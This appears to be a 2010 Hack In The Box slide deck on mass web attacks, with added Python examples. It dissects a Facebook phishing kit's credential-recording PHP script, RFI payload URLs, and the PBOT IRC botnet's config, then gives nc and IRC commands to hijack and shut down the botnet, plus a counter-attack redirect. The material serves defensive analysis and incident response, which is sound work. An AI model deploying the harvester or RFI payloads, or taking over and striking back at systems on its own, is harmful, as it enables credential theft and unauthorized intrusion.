Source: conference.hackinthebox.org/hitbsecconf2010kul/materials... (Hack In The Box, HITBSecConf 2010 Kuala Lumpur)
© TEHTRI-Security, www.tehtri-security.com. HITBSecConf Kuala Lumpur 2010
Speaker
Laurent OUDOT – Founder & CEO of TEHTRI-Security (2010) – Senior Security Expert
– When? 15 years of IT security
– What? Hardening, pentests...
– Where? On networks and systems of highly sensitive places: French Nuclear Warhead Program, United Nations, French Ministry of Defense...
– Research on defensive & offensive technologies
– Past: member of the RstAck team and of the Steering Committee of the Honeynet Research Alliance...
– Frequent presenter and instructor at computer security and academic conferences like CanSecWest, PacSec, BlackHat USA/Asia/Europe, HITB Dubai/Amsterdam, US DoD/US DoE, Defcon, HOPE, Honeynet, PH-Neutral, Hack.LU
– Contributor to several research papers for SecurityFocus, MISC Magazine, IEEE, etc.
About TEHTRI-Security
Company created in April 2010
Cutting-edge technologies
– Advanced & technical consulting
– Penetration tests / audits...
– Fighting information leaks, counter-intelligence...
Worldwide: conferences, training, consulting
– Canada, Lebanon, United Arab Emirates, Singapore, Netherlands, China, Malaysia, France...
Around 30 public security advisories (in 6 months)
International press / media
Introduction
Goal: analyze recent web attacks that targeted a huge number of people or servers
– End-users
– Web servers
Find & propose innovative solutions
Target audience:
– White hats, people who fight cybercrime, business intelligence & information warfare
Notice:
– Legal issues: we remind you to carefully respect the laws in your country before applying some of the techniques shown in this presentation (striking back, etc.).
Plan
1 – About the Attacks
2 – Finding Counter-Measures
3 – Real Life Examples
1. ABOUT THE ATTACKS Let’s have a look at some of those threats
Targeting the internet end-users
Simple example of action
Phase 1: Compromise a web server and add an evil payload on it
– Client-side attack (exploit kit). Goal: compromise workstations
– Pharming (password/data recorder). Goal: steal sensitive data (credit card numbers, passwords...)
Phase 2: Invite victims
– Pwn servers and send emails to tons of end users (future potential victims)
– Wait for them to connect & get trapped
Targeting random web servers
Phase 1: Identify a vector of intrusion that could be used against multiple servers during an offensive campaign
– E.g.: an easy Remote File Include (RFI) against a widely spread web application
Phase 2: Compromise servers to launch the massive attack from there
– E.g.: target random servers, or use search engines to find targets
Phase 3: Wait for servers to be compromised and abuse them
– E.g.: create a botnet containing web servers, and use them to start evil activities (DDoS...)
Hiding such evil activities
Automatic & standalone tools and methods that attack & spread by themselves
– A kind of evil cyber life that works alone to compromise servers, etc.
Multiple bounces
– The attackers have access to many compromised servers, which allows them to bounce and thus sometimes hide their addresses, etc.
Timeline – "quick wins"
– Short period of attacks, but multiple attacks
2. FINDING COUNTER-MEASURES
Finding Counter-Measures
To protect against such massive web attacks, we need to improve several fields
Detection
– Improving web-based intrusion detection
Protection/Containment
– Improving the hardening of web servers
Active Response
– Identify the attackers
– Identify the humans targeted
– Counter-attack...
The Internet contains millions of web sites that can be compromised easily
– Such massive web attacks will still exist for a while
LIVE REVIEW OF EVIL SOURCE CODE
Let's have a look at some sources stolen from web attackers
3. REAL LIFE EXAMPLES
And now let's have a look at two major threats
3.1 will focus on pharming against social networks
3.2 will focus on a botnet with web sites included as zombies
3.1 PHARMING ATTACK AGAINST FACEBOOK
Here is an example of how to handle an unknown pharming attempt (here: a credential-harvesting fake login page, delivered by phishing emails). The example focuses on a real attack that happened in 2009 against Facebook.
Pharming against Facebook
Phishing attack: tons of emails sent, asking recipients to log in to Facebook
Fake Facebook portal recording emails and passwords
FAKE FACEBOOK LOGIN PAGE (SOURCE)
Fake Facebook page: HTML sent
Here is the fake Facebook login page that was hosted on some compromised web servers
This HTML (JavaScript) code was sent to the incoming clients, who thought they were on Facebook. The whole page body is URL-encoded and written out with document.write(unescape(...)); only the beginning and the end are shown:

<script>
<!--
document.write(unescape("%3C%21DOCTYPE%20html%20PUBLIC%20%22-//W3C//DTD%20XHTML%201.0%20Strict//EN%22%0D%0A%20%20%20%22http%3A//www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd%22%3E%0D%0A%3Chtml%20xmlns%3D%22http%3A//www.w3.org/1999/xhtml%22%20xml%3Alang%3D%22en%22%20lang%3D%22en%22%20id
....
%7C%7C%7B%7D%29.checked%20%3D%200%3B%0D%0A%7D%0D%0A%0D%0Afunction%20pop%28url%29%20%7B%0D%0A%20%20window.open%28url%29%3B%0D%0A%7D%0D%0A%3C/script%3E%3C/div%3E%3C/body%3E%0D%0A%3C/html%3E%0D%0A%0D%0A"));
//-->
</script>
This JavaScript generates HTML
It contains the fake login FORM. This FORM sends the HTTP client to "write.php", which is hosted on the same compromised computer (the id attribute mimics the real login URL, but the action is the local script):

<form method="GET" action="write.php" id="https://login.facebook.com/login.php?login_attempt=1">

When a victim tries to log in, here is the GET request sent to "write.php" (the credentials travel in the query string, so they also end up in the compromised server's access log):

http://compromizedhost.tld/fake-facebook/write.php?charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&fb_dtsg=&version=1.0&return_session=0&charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&[email protected]&pass=oldsecret
Behavior of “write.php”
Once someone sends his login/password, he is redirected to another web page, which is the real Facebook login page
The end user then has to log in (again?) on the real Facebook page
– This is not really stealthy, but many end users just thought there had been a temporary error
HTTP response sent by "write.php":

HTTP/1.1 302 Found
Date: Tue, 28 April 2009 07:13:12 GMT
Server: Apache/2.0 (Unix) PHP/4.3
X-Powered-By: PHP/4.3
Location: http://www.facebook.com/login.php
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Was it stealth on Facebook’s side ?
The fake Facebook web page contained references to resources (images, JavaScript...) hosted on Facebook's infrastructure, like:
– http://static.ak.fbcdn.net/favicon.ico?8:132011
– http://b.static.ak.fbcdn.net/rsrc.php/zEDCY/lpkg/hm02tea0/en_US/141/160771/js/40m30takmjqccw4c.pkg.js
– ...
Thanks to the Referer sent by (most) web clients when fetching those resources, it was possible to get the URL of the pharming kit against FB from the logs of the side hosting them
What was possible then ?
Contact the webmasters / admins of the compromised sites used to host the evil Facebook phishing script
And ask them to send the files involved for further analysis
– 3 files found
• index.htm: fake login web page
• write.php: password recorder + 302 redirector
• passes.txt: ALL THE STOLEN PASSWORDS
Analyzing “write.php”
PHP script that records any GET arguments (cleartext output) and then bounces the victim to the real login page:

<?php
// The redirect header goes out first; nothing below produces output.
header("Location: http://www.facebook.com/login.php");
// passes.txt sits next to the script in the web root, so anyone who knows
// the URL can read it; it is opened in append mode, one record per victim.
$handle = fopen("passes.txt", "a");
foreach($_GET as $variable => $value)
{
    fwrite($handle, $variable);   // one "name=value" line per GET parameter
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");          // blank line terminates the record
fclose($handle);
exit();
?>
So, what contained “passes.txt” ?
It contained the email / passwords of any end users who thought it was a real email from Facebook...
Example (one record per victim, one GET parameter per line, a blank line between records):

...
charset_test=€,´,€,´,水,Д,Є
fb_dtsg=
version=1.0
return_session=0
[email protected]
pass=oldsecret
...
What could be done then ?
Containment
– Any email address compromised could be "blocked", and the end user could be contacted and asked to set a new password
Track the attackers
– The webmasters / admins of the compromised web server that hosted the pharming script could help with the logs of the site
– Good questions:
• Who asked for "passes.txt"? The IP addresses of the attackers
• When? Look at the different dates
• How many Facebook end users were compromised...? The size in bytes of what was sent
• A.B.C.D - - [28/Apr/2009:17:07:47 +0200] "GET /..../passes.txt HTTP/1.1" 200 194 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
• Here we have to look at the users included in the first 194 bytes of the file: the response size in the log line tells how much of passes.txt the attacker had at the time of that read
Innovative solution?
Tiny offensive solution for FB if they don't have the help of the compromised hoster
– For each resource (pictures) asked for by clients coming from the compromised host (see Referer), just send big fake pictures in RED with a security notice
Semi-offensive solution that could be tried by Facebook (trap!)
– "Handle" the accounts compromised on FB
– Add fake accounts on FB
– Log anything related to those accounts on FB
– Add those accounts in "passes.txt"
– Wait for the attackers to read that file
– Each time they connect to the fake accounts, it's one more chance to gather more info about them (law enforcement possibilities, etc.)
More innovative solution?
Example of an offensive solution that could be tried by FB:
– Change "passes.txt" so that the attackers are sent to another page for counter-attack plans (intrusion on the attackers' computer, or identifying them)

$ rm passes.txt; cat > passes.txt.php
<?php header("Location: http://malicious-site/anti-attackers/"); ?>

(For a request for "passes.txt" to reach "passes.txt.php", the web server has to map one onto the other, e.g. Apache content negotiation (MultiViews) or a rewrite rule; the 302 below shows it working on that server.)
– Sample of such a session from an attacker:

GET /malware/fb/passes.txt HTTP/1.1
Host: compromised-hosting-server
User-Agent: Mozilla/5.0 (X11; U; Linux; en-US) Firefox/3.6
Accept: text/html,application/xhtml+xml,application/xml

HTTP/1.1 302 Found
Server: Apache/2.2.14 (Unix) OpenSSL/0.9.8l DAV/2 PHP/5.3.1
Location: http://malicious-site/anti-attackers/
3.2 WEB BASED BOTNET
Here is an example of a technique that creates a botnet full of web servers…
Adding Web Sites into a Botnet
[Diagram: massive attacks against web sites; a command & control channel carries massive orders to the compromised web sites; final action (e.g.: DDoS)]
PBOT: The PHP Botnet
RFI attackers
– Automatic web scan against PHP sites
– If a PHP site is vulnerable to an RFI, the web server is turned into a zombie with PBOT
IRC command & control
– Login / password
– Many actions proposed
Hunting PBOT, PHP BotNet
Phase 1: Identify a PBOT attack
– Analyze your logs (web server)
– Find RFI (Remote File Include) tests and check if it's a PBOT, e.g.:
http://www.yoursite.tld/yourscript.php?yourargument1=http://ownedbox.tld/evilrepository/payload.txt?
Phase 2: Analyze the source code and retrieve sensitive information
– IRC server, port, password, channel...
– Version of PBOT, protocol used (e.g. over IRC PRIVMSG), internal password...
Phase 3: Counter-attack
– Infiltrate the botnet
– Identify the compromised computers (to alert the CERTs, administrators, host owners, etc.)
– Kill Pbot

Sample from the source code (the comments were in Portuguese in the original and are translated here):

class pBot
{
    var $config = array(
        "server"=>"a.b.c.d",
        "port"=>6669,
        "pass"=>"",             // server password
        "prefix"=>"owned|",
        "maxrand"=>8,
        "chan"=>"#pbotchannel",
        "key"=>"oxi",           // channel key
        "modes"=>"+p",
        "password"=>"l33tP4sS", // bot password
        "trigger"=>".",
        "hostauth"=>"*"         // * for any hostname
    );
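Phase 1 and Phase 2 as an added example, not code from the slides or from pbot: the first part flags RFI probes in request URIs (a query parameter whose value is a remote URL, with the trailing "?" that marks an include() attack) and groups them by payload repository, the second pulls the C&C settings out of the bot's $config array. The request URIs are constructed; the PHP snippet repeats the values shown on the slide and is otherwise constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Phase 1 works on request URIs (path + query string) as they appear in an
# access log. Schemes a PHP include() will open when allow_url_include is on.
REMOTE_RE = re.compile(r'^(https?|ftp|php|data|expect)://', re.IGNORECASE)

def rfi_probes(request_uri):
    """Query parameters whose value is a remote URL: the shape of a Remote File
    Include test. Legitimate redirect parameters also carry absolute URLs, so a
    hit is a lead; the trailing '?' is the tell-tale of an include() attack
    (whatever PHP concatenates after the URL becomes a harmless query string).
    Local File Inclusion (../../etc/passwd) is a different probe and is not matched."""
    hits = []
    for param, value in parse_qsl(urlsplit(request_uri).query, keep_blank_values=True):
        if REMOTE_RE.match(value):
            hits.append({"param": param,
                         "payload": value.rstrip("?"),
                         "include_style": value.endswith("?")})
    return hits

def scan(request_uris):
    """Group probes by payload repository: which scripts and parameters each
    attacker host was thrown at. One repository hitting many different scripts
    is the automated scanner the slide describes."""
    by_repo = {}
    for uri in request_uris:
        script = urlsplit(uri).path
        for hit in rfi_probes(uri):
            by_repo.setdefault(hit["payload"], set()).add((script, hit["param"]))
    return by_repo

# Phase 2: the $config array. Values are quoted strings or integers; the PHP
# line comments after a value are not matched by the entry regex.
CONFIG_ENTRY_RE = re.compile(r'"(?P<key>\w+)"\s*=>\s*(?P<val>"[^"]*"|\d+)')

def pbot_config(php_source):
    """Return the bot's C&C settings as a dict (empty if no config array is found)."""
    m = re.search(r'\$config\s*=\s*array\s*\((?P<body>.*?)\);', php_source, re.DOTALL)
    if not m:
        return {}
    cfg = {}
    for entry in CONFIG_ENTRY_RE.finditer(m.group("body")):
        raw = entry.group("val")
        cfg[entry.group("key")] = int(raw) if raw.isdigit() else raw[1:-1]
    return cfg

def cnc_summary(cfg):
    """Everything Phase 3 needs, in one line."""
    return "irc://{server}:{port}/{chan} key={key} botpass={password} trigger={trigger}".format(**cfg)

# --- constructed sample input ---
SAMPLE_URIS = [
    "/yourscript.php?yourargument1=http://ownedbox.tld/evilrepository/payload.txt?",
    "/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://a.b.c.d/evil??",
    "/shop/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://a.b.c.d/evil??",
    "/index.php?option=com_content&Itemid=1",          # normal traffic
    "/page.php?file=../../../../etc/passwd",            # LFI probe, not RFI
    "/go.php?url=https://www.example.org/landing",      # legitimate-looking redirect parameter
]
PBOT_SOURCE = r'''<?php
class pBot
{
    var $config = array(
        "server"=>"a.b.c.d",
        "port"=>6669,
        "pass"=>"",             // server password
        "prefix"=>"owned|",
        "maxrand"=>8,
        "chan"=>"#pbotchannel",
        "key"=>"oxi",           // channel key
        "modes"=>"+p",
        "password"=>"l33tP4sS", // bot password
        "trigger"=>".",
        "hostauth"=>"*"         // * for any hostname
    );
}
'''

if __name__ == "__main__":
    for repo, targets in scan(SAMPLE_URIS).items():
        print(repo, sorted(targets))
    print(cnc_summary(pbot_config(PBOT_SOURCE)))
```

The redirect parameter in the last sample URI is reported too, but without the include-style flag; in practice the response status of the probed request (a 200 or a PHP error instead of a redirect) is what separates a real inclusion from an open-redirect parameter.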
Infiltrate the Botnet
How to connect to the remote IRC server
– Use the native PHP code from Pbot (which then becomes a PHP client honeypot), or modify it
– Or sometimes use an IRC client, or do it by hand
Example by hand (safe)
– Connect
• nc -nvv a.b.c.d 6669
– Send your username + nickname
• USER ownedolsyezun 127.0.0.1 localhost :ownedolsyezun
• NICK owned|34944893
– If you get a PING, reply with the PONG
• PONG :xxxxxxxx
– Join the channel of the zombies...
• JOIN #pbotchannel oxi
– Become administrator of any zombie of this botnet
• PRIVMSG #pbotchannel :.user l33tP4sS
Identify who is infected
Use their command & control channel
– PRIVMSG #pbotchannel :.info
Each zombie answers on the channel, for example:

:owned|86540828!~ownedjzytf@x.a.b.c PRIVMSG #pbotchannel :[Vuln!]: http://www.xxxxx/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://a.b.c.d/evil??

Reading that line:
– Nickname, username of the zombie (random): owned|86540828!~ownedjzytf
– IP, hostname of the zombie: x.a.b.c
– PHP script that is vulnerable to an RFI: http://www.xxxxx/index.php
– Vulnerable parameter and RFI payload: _REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://a.b.c.d/evil??
– PBOT repository that was used for this infection: http://a.b.c.d/evil??
Kill the BotNet
How to ask all the bots on the channel to die? From the bot's source code:

case "die":                                         // command handled on the C&C channel
    $this->send("QUIT :MORRI! comando por $nick");  // QUIT message seen on the channel ("DIED! command by <nick>")
    fclose($this->conn);                            // close the socket for this session
    exit;                                           // and exit

Broadcast this command to every bot in the channel
– PRIVMSG #pbotchannel :.die
Stealth alternative: a direct PRIVMSG to each zombie...
Output retrieved through such a command
– You see all the different zombies dying (nick!user@host redacted):

:owned|...!...@... QUIT :Read error: EOF from client
:owned|...!...@... QUIT :Quit: MORRI! comando por owned|34944893
:owned|...!...@... QUIT :Quit: MORRI! comando por owned|34944893
...
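The whole Phase 3 session ("Infiltrate the Botnet", "Identify who is infected", "Kill the BotNet") as an added example, not code from the slides or from pbot: a minimal IRC client state machine that registers, answers PING, joins the channel with its key, authenticates with .user, parses the [Vuln!] replies to .info into an inventory of zombies, and finally broadcasts .die and watches the QUITs. There is no socket code: lines read from the server are fed in, and what the client wants to send is queued in outbox (with nc, that is what you would type). Every server line, nickname and hostname below is constructed; the channel, key, password and trigger are the values from the sample config. As the slides' legal notice says, sending commands to bots on someone else's infrastructure is an intrusion in most jurisdictions; the runnable part here is the parsing.

```python
from urllib.parse import urlsplit, parse_qsl

def parse_irc(line):
    """Split one IRC line into (prefix, command, params). The trailing
    parameter after ' :' may contain spaces and becomes the last param."""
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    params = head.split() + ([trailing] if sep else [])
    return prefix, params[0], params[1:]

def parse_vuln_report(text):
    """'[Vuln!]: <url>' -> (vulnerable script, RFI parameter, payload repository).
    The repository is the parameter whose value is an absolute URL; the '??'
    pbot appends to it is stripped."""
    url = text.split(":", 1)[1].strip()
    u = urlsplit(url)
    script = f"{u.scheme}://{u.netloc}{u.path}"
    for param, value in parse_qsl(u.query, keep_blank_values=True):
        if value.startswith(("http://", "https://", "ftp://")):
            return script, param, value.rstrip("?")
    return script, None, None

class PbotHunter:
    def __init__(self, cfg, nick):
        self.cfg, self.nick = cfg, nick
        self.outbox = []        # lines to write to the server, in order
        self.zombies = {}       # bot nick -> host, script, param, repo, alive
        self.authenticated = False

    def send(self, line):
        self.outbox.append(line)

    def start(self):
        """Registration; the username mimics the bots' own naming scheme."""
        user = self.nick.split("|")[0] + "hunter"
        self.send(f"USER {user} 127.0.0.1 localhost :{user}")
        self.send(f"NICK {self.nick}")

    def feed(self, line):
        prefix, cmd, params = parse_irc(line.rstrip("\r\n"))
        chan, trig = self.cfg["chan"], self.cfg["trigger"]
        if cmd == "PING":                          # answer, or the server drops us
            self.send(f"PONG :{params[0]}")
        elif cmd == "001":                         # registered: join the bots' channel
            self.send(f"JOIN {chan} {self.cfg['key']}")
        elif cmd == "366":                         # end of NAMES: we are in the channel
            self.send(f"PRIVMSG {chan} :{trig}user {self.cfg['password']}")
            self.send(f"PRIVMSG {chan} :{trig}info")
            self.authenticated = True
        elif cmd == "PRIVMSG" and prefix and params and params[-1].startswith("[Vuln!]"):
            nick, _, userhost = prefix.partition("!")
            script, param, repo = parse_vuln_report(params[-1])
            self.zombies[nick] = {"host": userhost.rpartition("@")[2], "script": script,
                                  "param": param, "repo": repo, "alive": True}
        elif cmd == "QUIT" and prefix:
            nick = prefix.partition("!")[0]
            if nick in self.zombies:
                self.zombies[nick]["alive"] = False

    def kill_all(self):
        """Broadcast the kit's own 'die' command; the bots only obey after .user."""
        if not self.authenticated:
            raise RuntimeError("authenticate first (.user <password>)")
        self.send(f"PRIVMSG {self.cfg['chan']} :{self.cfg['trigger']}die")

    def alive(self):
        return sorted(n for n, z in self.zombies.items() if z["alive"])

CFG = {"chan": "#pbotchannel", "key": "oxi", "password": "l33tP4sS", "trigger": "."}
SERVER_BEFORE_DIE = [   # constructed server transcript, up to the bots' .info replies
    "PING :1A2B3C4D",
    ":irc.example.net 001 owned|34944893 :Welcome to the Internet Relay Network owned|34944893",
    ":irc.example.net 366 owned|34944893 #pbotchannel :End of /NAMES list.",
    ":owned|86540828!~ownedjzytf@zombie1.example.net PRIVMSG #pbotchannel :[Vuln!]: "
    "http://www.victim-a.example/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content"
    "&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://a.b.c.d/evil??",
    ":owned|12345678!~ownedqwerty@zombie2.example.org PRIVMSG #pbotchannel :[Vuln!]: "
    "http://www.victim-b.example/wp-content/plugins/foo/bar.php?page=http://a.b.c.d/evil??",
]
SERVER_AFTER_DIE = [    # what the channel shows once .die has been broadcast
    ":owned|86540828!~ownedjzytf@zombie1.example.net QUIT :Quit: MORRI! comando por owned|34944893",
    ":owned|12345678!~ownedqwerty@zombie2.example.org QUIT :Quit: MORRI! comando por owned|34944893",
]

def run_session(cfg=CFG, nick="owned|34944893"):
    """Replay the scripted exchange; returns the hunter and the zombies alive before .die."""
    h = PbotHunter(cfg, nick)
    h.start()
    for line in SERVER_BEFORE_DIE:
        h.feed(line)
    before = h.alive()
    h.kill_all()
    for line in SERVER_AFTER_DIE:
        h.feed(line)
    return h, before

if __name__ == "__main__":
    hunter, were_alive = run_session()
    print("\n".join(hunter.outbox))
    for nick, z in hunter.zombies.items():
        print(nick, z["host"], z["script"], z["param"], z["repo"], "alive" if z["alive"] else "dead")
```

The inventory built from the [Vuln!] replies (host, vulnerable script, parameter, repository) is the list to hand to the CERTs and hosters in Phase 3; the repository URL common to all entries is the attacker's payload host.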
LIVE REVIEW OF EVIL SOURCE CODE
Let's have a look at some sources stolen from web attackers
CONCLUSION
Conclusion
Massive web attacks
– It's simple
– It's cheap
– It happens now
– But the IT security world doesn't talk much about those threats (not technical enough?)
• They prefer to focus on threats that happen in laboratories (super-futuristic exploits, etc.)
Improve monitoring & take a look at your logs
– Track down the attackers
– Steal their tools
– Share your findings
– Improve Internet security
"Life is short, play hard"
This is not a game.
Take care. Thanks.
www.tehtri-security.com
Contact TEHTRI-Security
– When you catch a web malware...
– When you need technical assistance...
– Meet TEHTRI-Security, ask for our trainings...
web (at) tehtri-security (dot) com